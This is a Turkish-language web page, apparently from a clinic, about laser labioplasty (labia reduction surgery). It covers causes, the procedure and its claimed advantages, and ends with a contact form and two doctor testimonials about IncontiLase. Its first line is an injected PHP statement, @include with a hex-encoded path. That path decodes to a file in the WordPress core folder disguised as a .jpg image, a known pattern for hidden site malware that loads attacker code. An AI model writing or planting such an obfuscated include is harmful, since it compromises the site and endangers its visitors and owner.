@include(pack('H*', '77702d696e636c756465732f696d616765732f77702d736b696e2e6a7067')); Lazerle Vajinal Tedavi ve Estetik - Labioplasti
tedaviler_labioplasti

LABİOPLASTİ (Dudak Estetiği)

En sık rastlanan genital estetik sorunlardan biri, dış ve iç dudakların büyüklüğü ve sarkmalardır. İç dudaklar ( labia minör ), klitorisin üst kısmından vajina girişinin altına kadar uzanan kıvrımlı yapıları oluşturur. Bazı kadınlarda iç dudakların dış dudaklardan biraz taşması doğal olarak kabul edilir. Ancak dış dudaklardan sarkacak şekilde uzun olması tıbben önemli bir sorun yaratmasa da estetik görüntüyü bozarak kadını çözüm arayışına iter. Bazen dış dudaklar ( labium majuslar ) yapısal olarak normalden uzun, büyük veya asimetrik olabilir.

Bu durumda cinsel ilişki esnasında penisin itmesi ile labiumlar gerilebilir ve bu da ağrıya yol açabilir. Tüm bu nedenlerle tedavi ve kozmetik amaçlı cerrahi ile labiumlar labioplasti ameliyatı ile normal boyutlarına indirilebilir. Asimetri – eğer varsa – giderilebilir. Labioplasti operasyonu daha önceden doğum yapmamış kişilerde de uygulanabilir. Hatta bakire kızlarda bile yapılması kızlık zarı açısından hiç bir problem yaratmayacaktır

İç dudakların normalden geniş ve iri olması genelde doğumdan gelen bir durumdur. Özellikle ergenlik döneminde hormonal etki ile birlikte artmaktadır. Bu durumun aslında bir hastalık olmadığını, yalnızca kişiden kişiye değişen anatomik (yapısal) bir olay olduğunu da söyleyebiliriz.

Diğer taraftan bazı kişilerde kronik tahriş olma (mantar enfeksiyonu, kaşıntı veya sürtünme gibi), ırsi (genetik) nedenlere bağlı olarak iç dudaklar normalden daha iri, geniş yüzeyli, kırışık ve sarkık olabilir. Hormonal nedenler arasında androjen hormonu alınması da labial hipertrofi sebebidir.

Dış dudakların çekilmesi ve yapılan doğumlar lada iç dudaklarda sarkma ve genişlemelere neden olunabilir. Ayrıca ilerleyen yaşlarda vücudumuzun cilt dokusunda olduğu gibi iç dudaklarda da sarkma, saçaklanma artabilir. Yine hormonal nedenlere bağlı iç dudaklarda renk koyulaşmaları da ortaya çıkabilir.

Dış genital organlar olan, büyük ve küçük dudak olarak bilinen yapılardan küçük dudaklar, doğuştan yapısal olarak veya doğum vb. etkenlerle normalden fazla büyür. Bu durum görüntü olarak kişiyi rahatsız edebileceği gibi, günlük yaşamda da bazı zorluklara yol açabilir. Cinsel ilişki sırasında rahatsızlık verebilir.

Bu durumun tedavisi için cerrahi olarak fazla doku çıkarılır. Lazer işlemin uygulanmasında büyük kolaylık sağlar. Kanamayı azaltır. İyileşmeyi kolaylaştırır. Lokal veya genel anestezi ile uygulanabilir. Lazer ile labioplasti ameliyatının en büyük avantajı ameliyatın daha kısa sürmesi, ameliyat esnasında kanamanın daha az olması ve ağrı vs gibi yan etkilerin minimuma inmesidir. İyileşme sonrası görüntü daha estetik ve doğaldır.

Doktora Sorun

* alanları doldurmanız zorunludur
  • dr2
    "Non-invaziv olmasının yanı sıra, IncontiLase’in temel avantajı ayakta tedavi prosedürüyle uygulanabilmesidir. Bu da hastalardaki ekonomik yükü azaltıyor."
    Dr. Urska Bizjak Ogrinc
  • dr1
    IncontiLasetedavisini takip eden bir yıl içinde SUI tanısı koyulan hastaların %77’sinde iyileşme görüldü.
    Dr. Sabina Sencar